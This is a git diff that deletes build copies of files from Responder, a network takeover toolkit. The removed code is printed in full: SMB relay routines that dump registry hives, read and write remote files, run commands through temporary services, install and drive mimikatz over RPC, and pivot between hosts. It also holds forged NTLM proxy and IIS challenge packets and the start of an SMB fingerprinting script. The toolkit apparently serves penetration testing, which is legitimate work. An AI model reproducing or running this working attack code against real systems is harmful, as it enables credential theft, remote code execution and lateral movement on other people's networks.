BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - print("Starting Windows Remote Registry...") - data,s,f = StartWinregService(f, Host, data, s) - data,s = CloseFID(f, data,s) - #We should be all good here. - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - - ##Error handling. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n") - return ModifySMBRetCode(data) - - data,s,handler,f = OpenHKLM(data,s,f) - - data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s) - if data[8:10] != b"\x25\x00": - print("[+] Something went wrong, try something else.") - return ModifySMBRetCode(data) - data,s = CloseFID(f, data, s) - data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s) - data,s,Output = ReadAndDelete(f, "\\Windows\\Temp\\"+Key+".tmp", data, s) - - #If the service was stopped before we came... - if stopped: - data,s = SMBOpenPipe(Host, data, s)#Get a new IPC$ TID. - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = StopWinregService(f, Host, data, s) - data,s = CloseFID(f, data,s) - data = ModifySMBRetCode(data) - - #After everything has been cleaned up, we write the output to a file. - WriteOutputToFile(Output, Host+"-"+Key+".tmp") - print("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp") - return data - - except: - #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. - print("[+] Something went wrong, try something else.") - return ModifySMBRetCode(data) - -##########ReadAFile############# -def ReadFile(data, s, File, Host): - try: - File = File.replace("/","\\") - data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) - data,s,Output = GrabAndRead(f, File, data, s) - print(Output) - return ModifySMBRetCode(data) ##Command was successful, ret true. - - except: - print("[+] Read failed. Remote filename was typed correctly?") - return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. - -def GetAfFile(data, s, File, Host): - try: - File = File.replace("/","\\") - data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) - data,s,Output = GrabAndRead(f, File, data, s) - WriteOutputToFile(Output, Host+"-"+File) - print("[+] Done.") - return ModifySMBRetCode(data) ##Command was successful, ret true. - - except: - print("[+] Get file failed. Remote filename was typed correctly?") - return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. - -##########UploadAFile############# -def WriteFile(data, s, File, FileSize, FileContent, Host): - try: - File = File.replace("/","\\") - data,s,f = SMBOpenFileForWriting(File, FileSize, FileContent, "C", Host, RW, data, s) - data,s = UploadAndWrite(f, FileSize, FileContent, data, s) - return ModifySMBRetCode(data) ##Command was successful, ret true. - - except: - print("[+] Write failed.") - return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. - -##########DeleteAFile############ -def DeleteFile(data, s, File, Host): - try: - File = File.replace("/","\\") - data,s = DeleteAFile(File, data, s, Host) - data,s = CloseTID(data, s) - return ModifySMBRetCode(data) ##Command was successful, ret true. - except: - print("[+] Delete operation failed.\n[+] Something went wrong.") - data,s = CloseTID(data, s) - return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. - -##########Psexec############# -def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, FileName): - - try: - RandomFName = GenerateRandomFileName() - WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt" - LogFile = "\\Windows\\Temp\\"+RandomFName+".txt" - Command = RunPath+" \""+Command+"\" \""+WinTmpPath+"\"" - ServiceNameChars = GenerateServiceName() - ServiceIDChars = GenerateServiceID() - - data,s = SMBOpenPipe(Host, data, s) - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s) - data,s = CloseFID(f, data,s) - time.sleep(1) - data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s) - data,s,Output = ReadAndDelete(f, LogFile, data, s) - print(Output) - data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) - - Logs.warning('Command executed:') - Logs.warning(clientIP+","+Username+','+Command) - - return data - - except: - #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print("[+] Something went wrong, try something else.") - return ModifySMBRetCode(data) - -##########Runas############# -def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): - - try: - Command = Command.replace('"', '\'') - RandomFName = GenerateRandomFileName() - WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt" - LogFile = "\\Windows\\Temp\\"+RandomFName+".txt" - Command = "%windir%\\Temp\\"+FileName+" \""+Command+"\" \""+WinTmpPath+"\"" - ServiceNameChars = GenerateServiceName() - ServiceIDChars = GenerateServiceID() - - data,s = SMBOpenPipe(Host, data, s) - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s) - data,s = CloseFID(f, data,s) - time.sleep(1) - data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s) - data,s,Output = ReadAndDelete(f, LogFile, data, s) - print(Output) - data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) - - Logs.info('Command executed:') - Logs.info(clientIP+","+Username+','+Command) - return data - - except: - data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) - #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print("[+] Something went wrong, try something else.") - return ModifySMBRetCode(data) - -##########MimiKatz RPC############# -def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): - global MimiKatzSVCID - global MimiKatzSVCName - try: - if isinstance(data, str): - data = data.encode('latin-1') - DisplayGUID, DisplayGUIDle = Generateuuid() - NamedPipe = GenerateNamedPipeName() - RandomFName = GenerateRandomFileName() - WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt" - #Install mimikatz as a service. - Command = "c:\\Windows\\Temp\\"+FileName+" \"rpc::server /protseq:ncacn_np /endpoint:\pipe\\"+NamedPipe+" /guid:{"+DisplayGUID+"} /noreg\" service::me exit" - MimiKatzSVCName = GenerateServiceName() - MimiKatzSVCID = GenerateServiceID() - data,s = SMBOpenPipe(Host, data, s) - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = CreateMimikatzService(Command, MimiKatzSVCName, MimiKatzSVCID, f, Host, data, s) - data,s = CloseFID(f, data,s) - - Logs.info('Command executed:') - Logs.info(clientIP+","+Username+','+Command) - - return data, DisplayGUIDle, NamedPipe - - except: - #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print("[+] Something went wrong, try something else.") - return ModifySMBRetCode(data) - -def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): - try: - data,guid,namedpipe = InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName) - data,s = SMBOpenPipe(Host, data, s) - ##Wait for the pipe to come up.. - time.sleep(1) - - data,s,f = BindCall(guid, "\x01\x00", "\\"+namedpipe, data, s) - data,s,f = MimiKatzRPC(Command, f, Host, data, s) - data,s = SMBDCERPCCloseFID(f, data,s) - ##### - #Kill the SVC now... Never know when the user will leave, so lets not leave anything on the target. - data,s = SMBOpenPipe(Host, data, s) - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = StopAndDeleteService(Command, MimiKatzSVCName, MimiKatzSVCID, f, Host, data, s) - data,s = CloseFID(f, data,s) - #Short sleep, to make sure the service had the time needed to stop before deleting mimikatz - time.sleep(0.5) - data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) - - Logs.info('Command executed:') - Logs.info(clientIP+","+Username+','+Command) - - return ModifySMBRetCode(data) - except: - #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.") - return ModifySMBRetCode(data) - -##########Pivot############# -def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath, RunAsFileName): - - try: - LocalIp = FindLocalIp() - WinTmpPath = "%windir%\\Temp\\log.txt" - Command = RunAsPath+" \"dir \\\\"+LocalIp+"\\C$\" \""+WinTmpPath+"\"" - ServiceNameChars = GenerateServiceName() - ServiceIDChars = GenerateServiceID() - data,s = SMBOpenPipe(Host, data, s) - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s) - data,s = CloseFID(f, data,s) - - ## We're leaving this host, clean it up.. - data = DeleteFile(data, s, "\\Windows\\Temp\\"+RunAsFileName, Host) - Logs.info('Command executed:') - Logs.info(clientIP+","+Username+','+Command) - return data - - except: - #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print("[+] Something went wrong, try something else.") - return ModifySMBRetCode(data) - -##########VerifyPivot############# -def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPath, RunAsFileName): - - try: - RandomFName = GenerateRandomFileName() - ServiceNameChars = GenerateServiceName() - ServiceIDChars = GenerateServiceID() - WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt" - LogFile = "\\Windows\\Temp\\"+RandomFName+".txt" - Command = RunAsPath+" \"dir \\\\"+Pivot+"\\C$\" \""+WinTmpPath+"\"" - - data,s = SMBOpenPipe(Host, data, s) - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s) - data,s = CloseFID(f, data,s) - time.sleep(1) - data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s) - data,s,Output = ReadAndDelete(f, LogFile, data, s) - data = DeleteFile(data, s, "\\Windows\\Temp\\"+RunAsFileName, Host) - - Logs.info('Command executed:') - Logs.info(clientIP+","+Username+','+Command) - - if re.findall('Volume in drive', Output): - return True, data - else: - return False, data - - except: - #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print("[+] Something went wrong, try something else.") - return ModifySMBRetCode(data) - -##########DoSomethingDumb############# -def DumbSMBChain(data, s, Host): - try: - File = "/Windows/win.ini" - File = File.replace("/","\\") - data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) - data,s,Output = GrabAndRead(f, File, data, s) - data, s = CloseTID(data, s) - return ModifySMBRetCode(data) ##Command was successful, ret true. - - except: - return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. diff --git a/build/lib/Responder/tools/MultiRelay/RelayMultiPackets.py b/build/lib/Responder/tools/MultiRelay/RelayMultiPackets.py deleted file mode 100644 index 2933377..0000000 --- a/build/lib/Responder/tools/MultiRelay/RelayMultiPackets.py +++ /dev/null @@ -1,1125 +0,0 @@ -#!/usr/bin/env python -# -*- coding: latin-1 -*- -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import struct -import os -import sys -from Responder.odict import OrderedDict -import datetime -from base64 import b64decode, b64encode - -# Packet class handling all packet generation (see odict.py). -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) - -#Python version -if (sys.version_info > (3, 0)): - PY2OR3 = "PY3" -else: - PY2OR3 = "PY2" - -def StructWithLenPython2or3(endian,data): - #Python2... - if PY2OR3 == "PY2": - return struct.pack(endian, data) - #Python3... - else: - return struct.pack(endian, data).decode('latin-1') - -##################HTTP Proxy Relay########################## -def HTTPCurrentDate(): - Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT') - return Date - -#407 section. -class WPAD_Auth_407_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"), - ("Connection", "Proxy-Connection: close\r\n"), - ("Cache-Control", "Cache-Control: no-cache\r\n"), - ("Pragma", "Pragma: no-cache\r\n"), - ("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - - -class WPAD_NTLM_Challenge_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWWAuth", "Proxy-Authenticate: NTLM "), - ("Payload", ""), - ("Payload-CRLF", "\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - - def calculate(self,payload): - self.fields["Payload"] = b64encode(payload) - -#401 section: -class IIS_Auth_401_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - -class IIS_Auth_Granted(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), - ("ContentLen", "Content-Length: "), - ("ActualLen", "76"), - ("CRLF", "\r\n\r\n"), - ("Payload", "\n\n\n\nLoading\n\n\n"), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload"])) - -class IIS_NTLM_Challenge_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWWAuth", "WWW-Authenticate: NTLM "), - ("Payload", ""), - ("Payload-CRLF", "\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - - def calculate(self,payload): - self.fields["Payload"] = b64encode(payload) - -class IIS_Basic_401_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"), - ("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"), - ("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) - -##################WEBDAV Relay Packet######################### -class WEBDAV_Options_Answer(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"), - ("Connection", "Connection: Keep-Alive\r\n"), - ("Content-Type", "Content-Type: text/html\r\n"), - ("CRLF", "\r\n"), - ]) - -##################SMB Relay Packet############################ -def midcalc(data): #Set MID SMB Header field. - return data[34:36].decode('latin-1') - -def uidcalc(data): #Set UID SMB Header field. - return data[32:34].decode('latin-1') - -def pidcalc(data): #Set PID SMB Header field. - return data[30:32].decode('latin-1') - -def tidcalc(data): #Set TID SMB Header field. - return data[28:30].decode('latin-1') - -#Response packet. -class SMBRelayNegoAns(Packet): - fields = OrderedDict([ - ("Wordcount", "\x11"), - ("Dialect", ""), - ("Securitymode", "\x03"), - ("MaxMpx", "\x32\x00"), - ("MaxVc", "\x01\x00"), - ("MaxBuffSize", "\x04\x41\x00\x00"), - ("MaxRawBuff", "\x00\x00\x01\x00"), - ("SessionKey", "\x00\x00\x00\x00"), - ("Capabilities", "\xfd\xf3\x01\x80"), - ("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"), - ("SrvTimeZone", "\xf0\x00"), - ("KeyLen", "\x00"), - ("Bcc", "\x10\x00"), - ("Guid", os.urandom(16).decode('latin-1')), - ]) - -##Response packet. -class SMBRelayNTLMAnswer(Packet): - fields = OrderedDict([ - ("Wordcount", "\x04"), - ("AndXCommand", "\xff"), - ("Reserved", "\x00"), - ("Andxoffset", "\x5f\x01"), - ("Action", "\x00\x00"), - ("SecBlobLen", "\xea\x00"), - ("Bcc", "\x34\x01"), - ###NTLMPACKET - ("Data", ""), - ###NTLMPACKET - - ]) - - -#Request packet (no calc): -class SMBSessionSetupAndxRequest(Packet): - fields = OrderedDict([ - ("Wordcount", "\x0c"), - ("AndXCommand", "\xff"), - ("Reserved","\x00" ), - ("AndXOffset", "\xec\x00"), - ("MaxBuff","\xff\xff"), - ("MaxMPX", "\x32\x00"), - ("VCNumber","\x00\x00"), - ("SessionKey", "\x00\x00\x00\x00"), - ###NTLMPACKET - ("Data", ""), - ###NTLMPACKET - ]) - -class SMBSessEmpty(Packet): - fields = OrderedDict([ - ("Empty", "\x00\x00\x00"), - ]) -##################SMB Request Packet########################## -class SMBHeader(Packet): - fields = OrderedDict([ - ("proto", "\xff\x53\x4d\x42"), - ("cmd", "\x72"), - ("errorcode", "\x00\x00\x00\x00" ), - ("flag1", "\x08"), - ("flag2", "\x01\xc8"), - ("pidhigh", "\x00\x00"), - ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), - ("Reserved", "\x00\x00"), - ("tid", "\x00\x00"), - ("pid", "\x3c\x1b"), - ("uid", "\x00\x00"), - ("mid", "\x00\x00"), - ]) - -class SMBNegoCairo(Packet): - fields = OrderedDict([ - ("Wordcount", "\x00"), - ("Bcc", "\x62\x00"), - ("Data", "") - ]) - - def calculate(self): - self.fields["Bcc"] = StructWithLenPython2or3(" 255: - self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" - self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-0) - else: - self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" - self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-3) - - if len(NTLMData)-8 > 255: - self.fields["AsnSecMechLenOfLen"] = "\x82" - self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-4) - else: - self.fields["AsnSecMechLenOfLen"] = "\x81" - self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-6) - - if len(NTLMData)-12 > 255: - self.fields["ChoosedTagLenOfLen"] = "\x82" - self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-8) - else: - self.fields["ChoosedTagLenOfLen"] = "\x81" - self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-9) - - if len(NTLMData)-16 > 255: - self.fields["ChoosedTag1StrLenOfLen"] = "\x82" - self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-12) - else: - self.fields["ChoosedTag1StrLenOfLen"] = "\x81" - self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-12) - - CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])+str(self.fields["NLMPAuthMsgNull"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["ExtraNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"]) - - SecurityBlobLenUpdated = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"]) - - ## Packet len - self.fields["andxoffset"] = StructWithLenPython2or3(" 1: - raise TypeError('expected at most 1 arguments, got %d' % len(args)) - try: - self.__end - except AttributeError: - self.clear() - self.update(*args, **kwds) - - def clear(self): - self.__end = end = [] - end += [None, end, end] - self.__map = {} - dict.clear(self) - - def __setitem__(self, key, value): - if key not in self: - end = self.__end - curr = end[1] - curr[2] = end[1] = self.__map[key] = [key, curr, end] - dict.__setitem__(self, key, value) - - def __delitem__(self, key): - dict.__delitem__(self, key) - key, prev, next = self.__map.pop(key) - prev[2] = next - next[1] = prev - - def __iter__(self): - end = self.__end - curr = end[2] - while curr is not end: - yield curr[0] - curr = curr[2] - - def __reversed__(self): - end = self.__end - curr = end[1] - while curr is not end: - yield curr[0] - curr = curr[1] - - def popitem(self, last=True): - if not self: - raise KeyError('dictionary is empty') - if last: - key = next(reversed(self)) - else: - key = next(iter(self)) - value = self.pop(key) - return key, value - - def __reduce__(self): - items = [[k, self[k]] for k in self] - tmp = self.__map, self.__end - del self.__map, self.__end - inst_dict = vars(self).copy() - self.__map, self.__end = tmp - if inst_dict: - return (self.__class__, (items,), inst_dict) - return self.__class__, (items,) - - def keys(self): - return list(self) - - if sys.version_info >= (3, 0): - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.keys - itervalues = DictMixin.values - iteritems = DictMixin.items - else: - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.iterkeys - itervalues = DictMixin.itervalues - iteritems = DictMixin.iteritems - - def __repr__(self): - if not self: - return '%s()' % (self.__class__.__name__,) - return '%s(%r)' % (self.__class__.__name__, list(self.items())) - - def copy(self): - return self.__class__(self) - - @classmethod - def fromkeys(cls, iterable, value=None): - d = cls() - for key in iterable: - d[key] = value - return d - - def __eq__(self, other): - if isinstance(other, OrderedDict): - return len(self)==len(other) and \ - min(p==q for p, q in zip(list(self.items()), list(other.items()))) - return dict.__eq__(self, other) - - def __ne__(self, other): - return not self == other - - -if __name__ == '__main__': - d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)]) - assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh'] diff --git a/build/lib/Responder/tools/RunFinger.py b/build/lib/Responder/tools/RunFinger.py deleted file mode 100644 index 805111f..0000000 --- a/build/lib/Responder/tools/RunFinger.py +++ /dev/null @@ -1,470 +0,0 @@ -#!/usr/bin/env python3 -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import re,sys,struct -import datetime -import multiprocessing -import os -import errno -import optparse -import sqlite3 -from RunFingerPackets import * -from Responder.odict import OrderedDict -from socket import * -from Responder.odict import OrderedDict - -__version__ = "1.8" - -parser = optparse.OptionParser(usage='python %prog -i 10.10.10.224\nor:\npython %prog -i 10.10.10.0/24', version=__version__, prog=sys.argv[0]) - -parser.add_option('-i','--ip', action="store", help="Target IP address or class C", dest="TARGET", metavar="10.10.10.224", default=None) -parser.add_option('-f','--filename', action="store", help="Target file", dest="Filename", metavar="ips.txt", default=None) -parser.add_option('-t','--timeout', action="store", help="Timeout for all connections. Use this option to fine tune Runfinger.", dest="Timeout", type="float", metavar="0.9", default=2) - -options, args = parser.parse_args() - -if options.TARGET == None and options.Filename == None: - print("\n-i Mandatory option is missing, please provide a target or target range.\n") - parser.print_help() - exit(-1) - -Timeout = options.Timeout -Host = options.TARGET -Filename = options.Filename -SMB1 = "True" -SMB2signing = "False" -DB = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/RunFinger.db" - -class Packet(): - fields = OrderedDict([ - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in list(kw.items()): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, list(self.fields.values()))) - -#Python version -if (sys.version_info > (3, 0)): - PY2OR3 = "PY3" -else: - PY2OR3 = "PY2" - - -if not os.path.exists(DB): - cursor = sqlite3.connect(DB) - cursor.execute('CREATE TABLE RunFinger (timestamp TEXT, Protocol TEXT, Host TEXT, WindowsVersion TEXT, OsVer TEXT, DomainJoined TEXT, Bootime TEXT, Signing TEXT, NullSess TEXT, IsRDPOn TEXT, SMB1 TEXT, MSSQL TEXT)') - cursor.commit() - cursor.close() - -def StructWithLenPython2or3(endian,data): - #Python2... - if PY2OR3 == "PY2": - return struct.pack(endian, data) - #Python3... - else: - return struct.pack(endian, data).decode('latin-1') - -def NetworkSendBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return bytes(str(data), 'latin-1') - -def NetworkRecvBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return str(data.decode('latin-1')) - -def longueur(payload): - length = StructWithLenPython2or3(">i", len(''.join(payload))) - return length - -def ParseNegotiateSMB2Ans(data): - if data[4:8] == b"\xfeSMB": - return True - else: - return False - -def SMB2SigningMandatory(data): - global SMB2signing - if data[70:71] == "\x03": - SMB2signing = "True" - else: - SMB2signing = "False" - -def WorkstationFingerPrint(data): - return { - b"\x04\x00" :"Windows 95", - b"\x04\x0A" :"Windows 98", - b"\x04\x5A" :"Windows ME", - b"\x05\x00" :"Windows 2000", - b"\x05\x01" :"Windows XP", - b"\x05\x02" :"Windows XP(64-Bit)/Windows 2003", - b"\x06\x00" :"Windows Vista/Server 2008", - b"\x06\x01" :"Windows 7/Server 2008R2", - b"\x06\x02" :"Windows 8/Server 2012", - b"\x06\x03" :"Windows 8.1/Server 2012R2", - b"\x0A\x00" :"Windows 10/Server 2016/2022 (check build)", - }.get(data, 'Other than Microsoft') - -def GetOsBuildNumber(data): - ProductBuild = struct.unpack(" 255: - OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[47+length:].split('\x00\x00\x00')[:2]]) - return OsVersion, ClientVersion - if length <= 255: - OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[46+length:].split('\x00\x00\x00')[:2]]) - return OsVersion, ClientVersion - except: - return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version" - -def GetHostnameAndDomainName(data): - try: - data = NetworkRecvBufferPython2or3(data) - DomainJoined, Hostname = tuple([e.replace("\x00", "") for e in data[81:].split('\x00\x00\x00')[:2]]) - #If max length domain name, there won't be a \x00\x00\x00 delineator to split on - if Hostname == '': - DomainJoined = data[81:110].decode('latin-1') - 